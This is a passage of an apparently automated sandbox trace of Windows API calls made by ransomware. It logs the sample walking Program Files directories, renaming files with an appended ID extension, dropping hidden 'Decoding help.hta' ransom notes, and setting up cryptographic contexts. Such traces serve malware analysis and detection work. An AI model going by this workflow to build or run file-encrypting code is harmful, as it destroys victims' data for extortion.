lpString2="THEMES.INF") returned -1 [0059.199] lstrlenW (lpString="THEMES.INF") returned 10 [0059.199] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0059.199] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0059.199] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="THEMES.INF" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF" [0059.199] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF" [0059.199] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF.[ID]g9uZrLhJaygpwRm1[ID]" [0059.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\themes.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\themes.inf.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.706] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\themes.inf.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe6c [0061.706] CreateFileMappingA (hFile=0xe6c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xe70 [0061.706] CryptAcquireContextA (phProv=0x18e1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 390 os_tid = 0xadc [0043.866] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\*.*", lpFindFileData=0x18f1fd30 | out: lpFindFileData=0x18f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81305af3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81305af3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da638 [0043.866] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.866] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x18f1fd30 | out: lpFindFileData=0x18f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81305af3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81305af3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.866] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.866] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.866] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x18f1fd30 | out: lpFindFileData=0x18f1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1645318, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xc1645318, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb0409ed0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xb9600, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGX.dll", cAlternateFileName="")) returned 1 [0044.229] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\*.*" [0044.230] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\*.*") returned 64 [0044.230] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\Decoding help.hta" [0044.230] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vgx\\decoding help.hta")) returned 0xffffffff [0044.230] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vgx\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f8 [0044.230] WriteFile (in: hFile=0x4f8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x18f1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x18f1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0044.231] CloseHandle (hObject=0x4f8) returned 1 [0044.231] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0044.232] lstrcmpiW (lpString1="Decoding help.hta", lpString2="VGX.dll") returned -1 [0044.232] lstrlenW (lpString="VGX.dll") returned 7 [0044.232] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\*.*" [0044.232] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\*.*") returned 64 [0044.232] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\", lpString2="VGX.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\VGX.dll" [0044.232] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\VGX.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\VGX.dll" [0044.232] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\VGX.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\VGX.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\VGX.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.232] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\VGX.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vgx\\vgx.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\VGX.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vgx\\vgx.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.303] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x18f1fd30 | out: lpFindFileData=0x18f1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1645318, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xc1645318, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb0409ed0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xb9600, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGX.dll", cAlternateFileName="")) returned 0 [0044.303] FindClose (in: hFindFile=0x5da638 | out: hFindFile=0x5da638) returned 1 Thread: id = 391 os_tid = 0xae8 [0043.867] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*", lpFindFileData=0x1901fd30 | out: lpFindFileData=0x1901fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da778 [0044.401] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.401] FindNextFileW (in: hFindFile=0x5da778, lpFindFileData=0x1901fd30 | out: lpFindFileData=0x1901fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.401] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.402] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.402] FindNextFileW (in: hFindFile=0x5da778, lpFindFileData=0x1901fd30 | out: lpFindFileData=0x1901fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARFR", cAlternateFileName="")) returned 1 [0044.402] lstrcmpW (lpString1=".", lpString2="ARFR") returned -1 [0044.402] lstrcmpW (lpString1="..", lpString2="ARFR") returned -1 [0044.402] lstrcmpiW (lpString1="windows", lpString2="ARFR") returned 1 [0044.402] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" [0044.402] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned 63 [0044.402] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\", lpString2="ARFR" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR" [0044.402] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*.*" [0044.402] GlobalMemoryStatus (in: lpBuffer=0x1901fd10 | out: lpBuffer=0x1901fd10) [0044.402] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11113a78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6ac [0044.422] CloseHandle (hObject=0x6ac) returned 1 [0044.422] FindNextFileW (in: hFindFile=0x5da778, lpFindFileData=0x1901fd30 | out: lpFindFileData=0x1901fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54ce0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54ce0b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ENES", cAlternateFileName="")) returned 1 [0044.422] lstrcmpW (lpString1=".", lpString2="ENES") returned -1 [0044.422] lstrcmpW (lpString1="..", lpString2="ENES") returned -1 [0044.422] lstrcmpiW (lpString1="windows", lpString2="ENES") returned 1 [0044.422] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" [0044.423] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned 63 [0044.423] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\", lpString2="ENES" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES" [0044.423] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*.*" [0044.423] GlobalMemoryStatus (in: lpBuffer=0x1901fd10 | out: lpBuffer=0x1901fd10) [0044.423] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x94d8800, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6ac [0044.448] CloseHandle (hObject=0x6ac) returned 1 [0044.448] FindNextFileW (in: hFindFile=0x5da778, lpFindFileData=0x1901fd30 | out: lpFindFileData=0x1901fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ENFR", cAlternateFileName="")) returned 1 [0044.448] lstrcmpW (lpString1=".", lpString2="ENFR") returned -1 [0044.448] lstrcmpW (lpString1="..", lpString2="ENFR") returned -1 [0044.448] lstrcmpiW (lpString1="windows", lpString2="ENFR") returned 1 [0044.448] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" [0044.448] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned 63 [0044.448] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\", lpString2="ENFR" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR" [0044.448] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*.*" [0044.448] GlobalMemoryStatus (in: lpBuffer=0x1901fd10 | out: lpBuffer=0x1901fd10) [0044.448] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11213e28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6ac [0044.529] CloseHandle (hObject=0x6ac) returned 1 [0044.529] FindNextFileW (in: hFindFile=0x5da778, lpFindFileData=0x1901fd30 | out: lpFindFileData=0x1901fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ESEN", cAlternateFileName="")) returned 1 [0044.529] lstrcmpW (lpString1=".", lpString2="ESEN") returned -1 [0044.529] lstrcmpW (lpString1="..", lpString2="ESEN") returned -1 [0044.529] lstrcmpiW (lpString1="windows", lpString2="ESEN") returned 1 [0044.532] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" [0044.532] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned 63 [0044.532] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\", lpString2="ESEN" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN" [0044.532] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*.*" [0044.532] GlobalMemoryStatus (in: lpBuffer=0x1901fd10 | out: lpBuffer=0x1901fd10) [0044.532] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x244a80b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6ac [0044.585] CloseHandle (hObject=0x6ac) returned 1 [0044.585] FindNextFileW (in: hFindFile=0x5da778, lpFindFileData=0x1901fd30 | out: lpFindFileData=0x1901fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FRAR", cAlternateFileName="")) returned 1 [0044.585] lstrcmpW (lpString1=".", lpString2="FRAR") returned -1 [0044.585] lstrcmpW (lpString1="..", lpString2="FRAR") returned -1 [0044.585] lstrcmpiW (lpString1="windows", lpString2="FRAR") returned 1 [0044.588] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" [0044.588] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned 63 [0044.588] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\", lpString2="FRAR" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR" [0044.588] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*.*" [0044.588] GlobalMemoryStatus (in: lpBuffer=0x1901fd10 | out: lpBuffer=0x1901fd10) [0044.588] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x244f01e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6ac [0044.701] CloseHandle (hObject=0x6ac) returned 1 [0044.701] FindNextFileW (in: hFindFile=0x5da778, lpFindFileData=0x1901fd30 | out: lpFindFileData=0x1901fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7516b10, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7941190, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FREN", cAlternateFileName="")) returned 1 [0044.701] lstrcmpW (lpString1=".", lpString2="FREN") returned -1 [0044.702] lstrcmpW (lpString1="..", lpString2="FREN") returned -1 [0044.702] lstrcmpiW (lpString1="windows", lpString2="FREN") returned 1 [0044.702] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" [0044.702] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned 63 [0044.702] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\", lpString2="FREN" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN" [0044.702] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*.*" [0044.702] GlobalMemoryStatus (in: lpBuffer=0x1901fd10 | out: lpBuffer=0x1901fd10) [0044.702] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9550a08, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6ac [0044.778] CloseHandle (hObject=0x6ac) returned 1 [0044.778] FindNextFileW (in: hFindFile=0x5da778, lpFindFileData=0x1901fd30 | out: lpFindFileData=0x1901fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd541900, ftCreationTime.dwHighDateTime=0x1c911ec, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd541900, ftLastWriteTime.dwHighDateTime=0x1c911ec, nFileSizeHigh=0x0, nFileSizeLow=0x205b0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSB1AR.LEX", cAlternateFileName="")) returned 1 [0044.782] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" [0044.782] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned 63 [0044.783] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\Decoding help.hta" [0044.783] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\decoding help.hta")) returned 0xffffffff [0044.783] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0044.822] WriteFile (in: hFile=0x320, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1901fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1901fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0044.823] CloseHandle (hObject=0x320) returned 1 [0044.824] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0044.824] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSB1AR.LEX") returned -1 [0044.824] lstrlenW (lpString="MSB1AR.LEX") returned 10 [0044.824] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" [0044.824] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common 